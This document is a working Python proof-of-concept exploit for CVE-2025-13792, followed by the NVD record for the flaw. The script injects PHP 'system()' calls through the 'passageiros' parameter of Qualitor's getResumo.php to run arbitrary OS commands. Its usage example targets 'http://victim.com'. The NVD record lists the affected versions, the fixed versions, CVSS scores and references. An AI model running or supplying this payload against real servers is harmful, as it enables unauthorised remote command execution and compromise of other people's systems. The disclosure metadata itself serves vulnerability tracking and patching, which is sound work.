CVE-2025-13792

import requests import sys # CVE-2025-13792 PoC - Qualitor Code Injection in getResumo.php # Target: Qualitor <= 8.20.104 / <= 8.24.97 def exploit(target_url, cmd="id"): """Exploit the code injection vulnerability via passageiro parameter""" endpoint = f"{target_url.rstrip('/')}/html/st/stdeslocamento/request/getResumo.php" # Payload: inject PHP code via passageiro parameter # Using system() to execute OS commands payload = f"1;@system('{cmd}');" params = { "passageiros": payload } try: response = requests.get(endpoint, params=params, timeout=10, verify=False) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response:\n{response.text}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [command]") print(f"Example: python {sys.argv[0]} http://victim.com id") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" exploit(target, command)

{"cve": {"id": "CVE-2025-13792", "sourceIdentifier": "[email protected]", "published": "2025-11-30T16:15:47.260", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Qualitor up to 8.20.104/8.24.97. Affected by this vulnerability is the function eval of the file /html/st/stdeslocamento/request/getResumo.php. Performing a manipulation of the argument passageiros results in code injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. Upgrading to version 8.20.105 and 8.24.98 addresses this issue. Upgrading the affected component is advised."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://vuldb.com/?ctiid.333796", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.333796", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.691251", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.704314", "source": "[email protected]"}, {"url": "https://www.qualitor.com.br/official-security-advisory-cve-2025-13792", "source": "[email protected]"}, {"url": "https://www.youtube.com/watch?v=hU8YbFc6KpI", "source": "[email protected]"}]}}